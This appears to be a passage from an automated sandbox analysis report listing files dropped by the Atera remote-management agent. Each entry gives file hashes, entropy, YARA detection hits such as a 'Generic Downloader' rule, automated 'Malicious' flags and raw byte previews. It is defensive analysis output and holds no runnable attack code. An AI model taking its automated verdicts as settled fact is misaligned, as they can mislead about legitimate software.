                                                                                                                                                                                                                                                                                                                                  Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>...<startup>....<supportedRuntime version="v4.0" />....<supportedRuntime version="v2.0.50727" />...</startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Diagnostics.DiagnosticSource" publicKeyToken="cc7b13ffcd2ddd51" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-5.0.0.0" newVersion="5.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Runtime.CompilerServices.Unsafe" publicKeyToken="b03f5f7f11d50a3a" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-5.0.0.0" newVersion="5.0.0.0" />.. </dependentAss

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\TicketingPackageExtensions.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):79912
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.066410859406026
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:M9+DHJ7vgt3f9mKGpqfwTwL5pxaRt4csUhtcyWH7Ov+t7mEpYi605Hm:U+DHJCmKK0wu5RcsU7cyWH737H76N
                                                                                                                                                                                                                                                                                                                                  MD5:6B5E1EB2B26811947EBC7BB7F8633B5B
                                                                                                                                                                                                                                                                                                                                  SHA1:BA5874861002E71308F1FB4B2738BCDB39FCA309
                                                                                                                                                                                                                                                                                                                                  SHA-256:434E69F7ADBED6670B7037B37F514CB7BAFC9C745431040F12B2B4DD1F51F781
                                                                                                                                                                                                                                                                                                                                  SHA-512:611EB9422547EB7AFD53D25023A6E327932FBD2485C920BE71E3ABA40A50FE020A4E61C63CB4448053F6779B5553D393EB181FB43446AE2AF4F29E247F8D8EEE
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\TicketingPackageExtensions.dll, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\TicketingPackageExtensions.dll, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..............$... ...@....... ...................................`.................................}$..O....@..................((...`.......#..8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................$......H........Y..8............................................................0..........(....(.....r...p... .....r...p..(......o......(.....o......(.....o..........s......[o......s....%.o........o .....s!..........s"...%......io#...o$.....o%...(&.........,...o'......*......y.,........0..........(....(.....r...p... .....r...p..(......o......(.....o.......((.........s......[o......s....%.o........o).......s*..........s"......i.l...........io+.....(.........o,.........,...o'......*.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\TicketingPackageExtensions.dll.config

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):953
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.9874198404771155
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:24:JduPF7NhOXrRH2/dVxlPH2/FVQ7uH2/F9y:327O7RgdjdgFSagFw
                                                                                                                                                                                                                                                                                                                                  MD5:8C9F9547ABA4CD154FAA858695986C4E
                                                                                                                                                                                                                                                                                                                                  SHA1:667630B8AEA31C20C20EE569983B73028F0DBA21
                                                                                                                                                                                                                                                                                                                                  SHA-256:7DE06E53089587194D3669B5F2050B363CC2AC1BC66F0537EC4D7AD94357D46F
                                                                                                                                                                                                                                                                                                                                  SHA-512:C305E923A197E2C39813D423FE50D94F183E932BCC66DBEE5667AD7F4083254D50510E35ED3603555FEB4C42F580C8A1FA3D1568CC7305D22B79AB406607F836
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Diagnostics.DiagnosticSource" publicKeyToken="cc7b13ffcd2ddd51" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-5.0.0.0" newVersion="5.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Runtime.CompilerServices.Unsafe" publicKeyToken="b03f5f7f11d50a3a" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-5.0.0.0" newVersion="5.0.0.0" />.. </dependentAssembly>.. </assemblyBinding>.. </runtime>..</configuration>

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\TicketingTrayTMP.exe

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):350248
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):2.8981776683037355
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:kr71RSb/jb50EH8VAynnnnnnnnnnnnnnn8fMF:H5q
                                                                                                                                                                                                                                                                                                                                  MD5:2E651E24D757C144724D37E2F5325956
                                                                                                                                                                                                                                                                                                                                  SHA1:32F3BD69FA1B05F2E88A6D9FECB861272F2A323C
                                                                                                                                                                                                                                                                                                                                  SHA-256:042AFEA8995A3AA13001C50B36959C1171D61BDCABFA49D3C7FA129F1A137AA1
                                                                                                                                                                                                                                                                                                                                  SHA-512:CBF4E6E922F6D787198F7C9BA5AC6A68706E47C1A2C4AEA7A25BE55EF92824F6EBC63FC94FB33E18A38B591266A6C4142D79C59F9E82699D84E5F24E74648132
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..... g.........."...0......d........... ........@.. .............................._&....`.....................................O........a...........0..((..........\................................................ ............... ..H............text........ ...................... ..`.rsrc....a.......b..................@..@.reloc..............................@..B........................H........)..T$...........M..`............................................0............,t.....r...p(....-..r...p(....-..r...p(....-)+G(....(.....d...(....,.(....+*(.....L...(......,..(.... ....(....+..,...s.........(.... ....`(.......(....rA..p(....rQ..p.%-.&.+.o....(....(......r]..pry..p(....( ...(....,......(!....("...(#....o$..........s%...(&...(....%(....('...r]..pr...p(....( ...((...s)........~....(*...r]..pr...p(....( ...((....C..r...p(....(+...((...(....rA..p(....rQ..p.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\TicketingTrayTMP.exe.config

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1786
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.998101412964689
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:48:3sIk7O7RgdjdgFSagFgg+msg+w3Zg+wBw:8TizwzH
                                                                                                                                                                                                                                                                                                                                  MD5:DACBD4EDD0163701F63ADA3E81D8540E
                                                                                                                                                                                                                                                                                                                                  SHA1:219647896B3575AA8A07E2903D50304919C27CA7
                                                                                                                                                                                                                                                                                                                                  SHA-256:DF0FBC7B2A5449681549C81B7EB77B2CE8D3C0C62244C39442A73A0291124BCB
                                                                                                                                                                                                                                                                                                                                  SHA-512:5C725DEE661DF9FFE6D3723606FAF98F0B16094DAFC011CDE062436B351671E952A2C6CFA218E08785DBC2E69E97EC8218E1447683C1450C5BF9CCDC75C2EA73
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>...<startup>....<supportedRuntime version="v4.0" />....<supportedRuntime version="v2.0.50727" />...</startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Diagnostics.DiagnosticSource" publicKeyToken="cc7b13ffcd2ddd51" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-5.0.0.0" newVersion="5.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Runtime.CompilerServices.Unsafe" publicKeyToken="b03f5f7f11d50a3a" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-5.0.0.0" newVersion="5.0.0.0" />.. </dependentAss

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\UserDetections.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):59944
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.132661735364399
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:U6O442hHI1kIHLxnuFjBm+UuLcxVePk+CXVT+rB9ezGREpYi60G:U6O4JuxnT+UuLMcBClyrvGGa763
                                                                                                                                                                                                                                                                                                                                  MD5:BD26EAA17F4B2D97B949C6179A0A9123
                                                                                                                                                                                                                                                                                                                                  SHA1:B6DC1F8FBCBF6B0F33F51E071EE640143CF1EF9D
                                                                                                                                                                                                                                                                                                                                  SHA-256:72B3F2E765A37D45A5FB749FD4C5EC777939A06C44865E6AA8F64980515C2606
                                                                                                                                                                                                                                                                                                                                  SHA-512:38FBEBD77ED740F647F2F3474E5E1DCCAECACB22FBB0E05FD6696F6BD9FF1D5D6B335B7882365FCA8B6D9ABB8FC5C8525C27DAE1D3544DEEE8242A47EEF608A8
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\UserDetections.dll, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................" ..0.................. ........... ....................... ......\.....`.................................m...O.......................((..............8............................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........X..0.............................................................{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..(....*..s....}.....s....}.....(......o8...(...+}....*..0...........{....o.....8......(.....s.......}E.....u....}D....{D...,........s....(....&+ms.......}G.....u....}F....{F...,........s....(....&+8s.........}I......u....}H.....{H...,.........s....(....&..(....:J.............o.....*.................0..I........{....o.....{....o.....+...(

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\UserDetections.dll.config

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1191
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.971943087661362
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:24:JduPF7NhOXrRH2/dVQ7uH2/FVxlPH2/FV0PH2/+w39y:327O7RgdSagFjdgFsg+w3w
                                                                                                                                                                                                                                                                                                                                  MD5:B8E88B1C181AFEB535BFEA1155000E8E
                                                                                                                                                                                                                                                                                                                                  SHA1:EB9066E96542DCE5F35DBF2F1424FD79ACEBB65F
                                                                                                                                                                                                                                                                                                                                  SHA-256:5D094CC46FED5173A2B1BE4C8E5DBDB658D2C14ABD367C47DFC6F6EABD5F295C
                                                                                                                                                                                                                                                                                                                                  SHA-512:58459651D3358FDDD4114AB569786A2306338C08D27D3D449BE2084EAE9D4A619C5650D3699DCA6702AEFDE8F9E77FD9E56C87EF51D4A8CCB2A22A378C488C37
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Runtime.CompilerServices.Unsafe" publicKeyToken="b03f5f7f11d50a3a" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-5.0.0.0" newVersion="5.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Diagnostics.DiagnosticSource" publicKeyToken="cc7b13ffcd2ddd51" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-5.0.0.0" newVersion="5.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Buffers" publicKeyToken="cc7b13ffcd

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\t2tWinFormAppBarLib.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):23080
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.499110601684846
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:KLOGTOwM15TRwLm6or29Nyb8E9VF6IYijSJIVxyycCc:KnMTR0Pa25EpYi60tc
                                                                                                                                                                                                                                                                                                                                  MD5:4B6E586C1B942B65439A2F9A963B6154
                                                                                                                                                                                                                                                                                                                                  SHA1:EB940E77A0BEA7559D93379D3B53C6ED098A037C
                                                                                                                                                                                                                                                                                                                                  SHA-256:4B106D19EEC683BAA78F0C5AED41629638F4B72B0C9C67E60CD40107EDDEB5A1
                                                                                                                                                                                                                                                                                                                                  SHA-512:B3CCF4072F61C2119ACDEF297B6D9DC67064A38823553B8F04FDD83BBFCE024F93EB9778DAEB905CF6E0F5C4A8D8D7ADBC8A763FB16A7651926831FF0E4D0307
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....\.\.........." ..0..(...........G... ...`....... ....................................`..................................F..O....`..L............2..((...........E............................................... ............... ..H............text...4'... ...(.................. ..`.rsrc...L....`.......*..............@..@.reloc...............0..............@..B.................G......H........)..$............................................................~....*.......**...(.....*...0...........~.....o......,..~.....o......+i.s(...%.o.....%.o.....%.o.....%.o.....%.o....o ....%.o....o"....%.o....o$....%.o....o&.....~......o........+..*..0............(.......o....o.......o%...o................o!......(....}.......o!......(....}.......o!......(.....o#.......(....X}.......o!......(.....o#.......(....X}..............s..........%..o.....#....%........o ...&*...

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\x64\SQLite.Interop.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1817640
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.551341026038557
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:49152:r9EeNSPwEW3cFSI4Tfm3hvbHsjAJcAMkPz:r9Nzm31PMoz
                                                                                                                                                                                                                                                                                                                                  MD5:BF7A6CF861B613CE5394F0575E5664A3
                                                                                                                                                                                                                                                                                                                                  SHA1:9FDE648F515D8A4069340E2781C6EBCC119B0B7E
                                                                                                                                                                                                                                                                                                                                  SHA-256:980B3639A01B0F62C8E760BA637BB83C509667DDBD02E68FC114983331B875A7
                                                                                                                                                                                                                                                                                                                                  SHA-512:CF34346F5AEFDA23E1824C44870CFDE7DB87E00C1D85508F7FC35C3F5BD06794DF008127F370666C0E53BB6F3B14ECFC54ECD7DB149BF298DDFCFAC2394EAE37
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........nN\.. ... ... .Q..... .Q...e. .Q..... ..Q#... ..Q%... ..Q$... .8..... ..].... ...!.~. .rQ(... .rQ ... .wQ.... .rQ"... .Rich.. .........................PE..d.....d.........." ......................................................................`.................................................P...x................!......((...........@..p............................A...............................................text...0........................... ..`.rdata...1.......2..................@..@.data....`... ...J..................@....pdata...!......."...P..............@..@.gfids...............r..............@..@.rsrc................t..............@..@.reloc...............~..............@..B................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\x86\SQLite.Interop.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1436200
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.781307459548009
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:Ys5ThI+vIjDEzn7tcBGtYnxLbdVlRdouD5RawYkGq78Yr4i9YE1tOvhefHXCvEsi:nlI+vIjE7mjOuKa8Riy+gvhaIn2+0V
                                                                                                                                                                                                                                                                                                                                  MD5:869599488E6C1DA641F0EC556898F1D0
                                                                                                                                                                                                                                                                                                                                  SHA1:F9D6448981059B62040AFF630B76D0B2AE9A1A2E
                                                                                                                                                                                                                                                                                                                                  SHA-256:DEC6449DCE5410895503E7D946761C5A40DF7D03DCCE47B4153601507357F6B9
                                                                                                                                                                                                                                                                                                                                  SHA-512:013861070B779D7B9E61971499B794E324BF4AE0F5FA0D2BC397349631E7037E4376FBCB94454D6F3ED90BAE071D3D6756E96AD0985D9B1229214FDABAC675EA
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......v..{2..(2..(2..(.*W(...(.*U(...(.*T(...(..)%..(..)'..(..)=..(.Im(:..(,.5(1..(2..(...(..)3..(..)3..(..Y(3..(..)3..(Rich2..(........PE..L.....d...........!.....f...X......................................................g.....@.........................P...t.......x....`..................((...p..X...@...p...............................@...............H............................text....d.......f.................. ..`.rdata..............j..............@..@.data....8.......,..................@....gfids.......P.......&..............@..@.rsrc........`.......(..............@..@.reloc..X....p.......2..............@..B........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent.zip

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Zip archive data, at least v4.5 to extract, compression method=deflate
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):583489
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.99944408666799
                                                                                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:CLLJGMlifhYeKrN8qSQDqPVK04BwQjtVcUf7DmZMilOugjC6w:GwfhYeKraZQDqPY0E/4Uf7owugjm
                                                                                                                                                                                                                                                                                                                                  MD5:9614D1DA18956DE06747C03068208D66
                                                                                                                                                                                                                                                                                                                                  SHA1:FEA2680DDB9E4CEEA8489A132DF9A1542FEBFE88
                                                                                                                                                                                                                                                                                                                                  SHA-256:DDE9E0CA3FD274902F1A4C22CFEC6870C6C4DBBCCAD17D2189477AB60F769DAB
                                                                                                                                                                                                                                                                                                                                  SHA-512:D8E46A5819E9DCED61471966646DE153BF3480933054C50190D50DE4900685265367B12C9147630F184CE8809786FC010BF6FCD1884035FB4C77CFDE660A8B9D
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:PK..-......q1Y............5...AgentPackageUpgradeAgent/AgentPackageUpgradeAgent.exe....0........d.......o.H..:|p^xA......v.g.J..r:.....@..Q..H..^"]....G..... |...o.<?%....#".....3_s....c..JN.j..Vg_.....$...".,=T.=..5.b.U-..5..7"..H.....9462.._.Mb.e....&.cJ.+!:.....7H]p..#..()6~..0...|8..\......~.D..M.R..Y-[.efI...O..3..\.D.O.V."..0....l.....~.zdP.Hh.r.^R.z5 .=b.....%.X....(..E..T].'bk..ir...V...|.M....=...<..e...5... ...V./.....,....{..-.xa..s.}.e.{........y.%.LY^..HnIp.;....+.Gy.. .Z..e2.bxOy.._...L..g.F.{.C.....9......T.^.I.........NK4.a..4...cf<..@.GI..q..L7.]..f.g[.......E|{x...1....E...8..!.u..g..^%....Y.5^..|...H.....&hQ..E..i(:.6.............)A...Q=..).l..bs#5......./..Q.3..8.-......f@WV.d]i".{d[..v.p.l+.WO.]L...x<....rz#.*i......!.-.F*.:\9.%.cI.Y...=..f.\....9?.v,..}<../<c...U..C._o....'. .;..$,.. .Y......z..m.........#t.<..i..s....u...D..}5O..5O......j..O.../.%8.p.5...@....M....[rG...L.o...J2..<rS...[i<....})}....[x.....v^..=.su....Oy@g....

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):55344
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.801614737823664
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:R4DgbepEIgcvDiMd+R5B153ieGuftxw5dfiGoxkEpYinAMxCN4:Rr4EIgcxdQdGuftxw5dfiZd7Hxe4
                                                                                                                                                                                                                                                                                                                                  MD5:D11B2139D29E79D795054C3866898B7F
                                                                                                                                                                                                                                                                                                                                  SHA1:020581C77ED4BC01C3F3912F304A46C12CA443E6
                                                                                                                                                                                                                                                                                                                                  SHA-256:11CDB5EC172389F93F80D8EFF0B9E5D4A98CFEAB6F2C0E0BC301A6895A747566
                                                                                                                                                                                                                                                                                                                                  SHA-512:DE5DEF2EFCBA83A4B9301DD342391C306CF68D0BB64104839DFC329B343544FD40597A2B9867FD2A8739C63081D74157ACFC9B59C0CB4878B2F5155F582A6F09
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...r..f.........."...0.................. ........@.. ....................... .......M....`.................................h...O.......x...............0(..........0................................................ ............... ..H............text........ ...................... ..`.rsrc...x...........................@..@.reloc..............................@..B........................H.......pR...n...........................................................0..Y........o.......+C......o......r...p.o....t)...r...p(....,.........,..o.......&....X....i2..*..*...........$;..........8G.......0..#.......~....r/..po.......(....}.....{....(....,.rw..ps....z..{....o......r...p.o.......r...p.o....t)...}.....{.....(....,..r...p..o......}......}.....r...po.......r...p.o....t)...}.....{.....(....,..r...p..o......}......}.......,..o.........5.,..o......,..o......,..o....

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe.config

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):535
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.076084597400077
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12:MMHdG3VO3rdZRLNFF7ap+5v5OXrRf/2//FicYo4xm:JdfrdDPF7NhOXrRH2/d9r
                                                                                                                                                                                                                                                                                                                                  MD5:D505E3DE03F172FA2B246E210054C5F7
                                                                                                                                                                                                                                                                                                                                  SHA1:F5A480F56F760EEBA3B29108387E54D70A721127
                                                                                                                                                                                                                                                                                                                                  SHA-256:A568F933F09B1AD1EE5E88DDCFFA1FE5921D18B73477136E1FAEE55F2BEF399A
